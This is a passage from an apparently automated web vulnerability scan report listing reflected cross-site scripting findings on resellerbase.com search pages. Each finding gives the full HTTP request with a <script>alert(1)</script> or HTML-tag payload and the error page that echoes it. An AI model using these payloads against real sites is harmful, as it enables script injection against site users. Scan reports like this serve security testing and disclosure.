<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/search.php?keyword=search...ff1db<a>e4669b8c73d&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5349. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 42078<script>alert(1)</script>be48b46c2fc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&42078<script>alert(1)</script>be48b46c2fc=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&42078<script>alert(1)</script>be48b46c2fc=1 was not found on this server.</p>
...[SNIP]...

2.5350. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload dc2c5<a>9b4503bfaf1 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2dc2c5<a>9b4503bfaf1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2dc2c5<a>9b4503bfaf1 was not found on this server.</p>
...[SNIP]...

2.5351. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 78f0a<script>alert(1)</script>b1f86acdaef was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service78f0a<script>alert(1)</script>b1f86acdaef/software-scripts/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service78f0a<script>alert(1)</script>b1f86acdaef/software-scripts/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5352. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b518b<script>alert(1)</script>0586e1f6fdf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scriptsb518b<script>alert(1)</script>0586e1f6fdf/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scriptsb518b<script>alert(1)</script>0586e1f6fdf/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5353. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 1d8df<script>alert(1)</script>503270f0f2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes1d8df<script>alert(1)</script>503270f0f2/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes1d8df<script>alert(1)</script>503270f0f2/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5354. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 870fa<script>alert(1)</script>68c517c1429 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos870fa<script>alert(1)</script>68c517c1429/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos870fa<script>alert(1)</script>68c517c1429/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5355. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 67359<script>alert(1)</script>ad2f4a7de4f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/search.php67359<script>alert(1)</script>ad2f4a7de4f?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/search.php67359<script>alert(1)</script>ad2f4a7de4f?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5356. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload fae15<a>f42aa35b73a was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/search.php?keyword=search...&Submit3=Searchfae15<a>f42aa35b73a&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/search.php?keyword=search...&Submit3=Searchfae15<a>f42aa35b73a&opt=2 was not found on this server.</p>
...[SNIP]...

2.5357. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload eac2d<a>afeb678f030 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/search.php?keyword=search...eac2d<a>afeb678f030&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:44:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/search.php?keyword=search...eac2d<a>afeb678f030&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5358. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 92ecd<script>alert(1)</script>eb9335bfcdb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&92ecd<script>alert(1)</script>eb9335bfcdb=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:46:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&92ecd<script>alert(1)</script>eb9335bfcdb=1 was not found on this server.</p>
...[SNIP]...

2.5359. http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload e0955<a>377391e46cb was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2e0955<a>377391e46cb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2e0955<a>377391e46cb was not found on this server.</p>
...[SNIP]...

2.5360. http://www.resellerbase.com/web-service/software-scripts/themes/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98758<script>alert(1)</script>f711038e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service98758<script>alert(1)</script>f711038e3/software-scripts/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service98758<script>alert(1)</script>f711038e3/software-scripts/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5361. http://www.resellerbase.com/web-service/software-scripts/themes/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7c00c<script>alert(1)</script>c5df6afa3fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts7c00c<script>alert(1)</script>c5df6afa3fe/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts7c00c<script>alert(1)</script>c5df6afa3fe/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5362. http://www.resellerbase.com/web-service/software-scripts/themes/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 777fb<script>alert(1)</script>9424a29c9a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes777fb<script>alert(1)</script>9424a29c9a/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes777fb<script>alert(1)</script>9424a29c9a/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5363. http://www.resellerbase.com/web-service/software-scripts/themes/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ca378<script>alert(1)</script>9665ae04711 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/software-scripts/themes/search.phpca378<script>alert(1)</script>9665ae04711?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/search.phpca378<script>alert(1)</script>9665ae04711?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5364. http://www.resellerbase.com/web-service/software-scripts/themes/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 62ed3<a>7cfd13c2101 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/search.php?keyword=search...&Submit3=Search62ed3<a>7cfd13c2101&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/search.php?keyword=search...&Submit3=Search62ed3<a>7cfd13c2101&opt=2 was not found on this server.</p>
...[SNIP]...

2.5365. http://www.resellerbase.com/web-service/software-scripts/themes/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 55dec<a>d76bbdfb5d3 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/software-scripts/themes/search.php?keyword=search...55dec<a>d76bbdfb5d3&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/software-scripts/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:45:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/software-scripts/themes/search.php?keyword=search...55dec<a>d76bbdfb5d3&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5366. http://www.resellerbase.com/web-service/software-scripts/themes/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/software-scripts/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 80729<script>alert(1)</script>98edb0f8ed7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
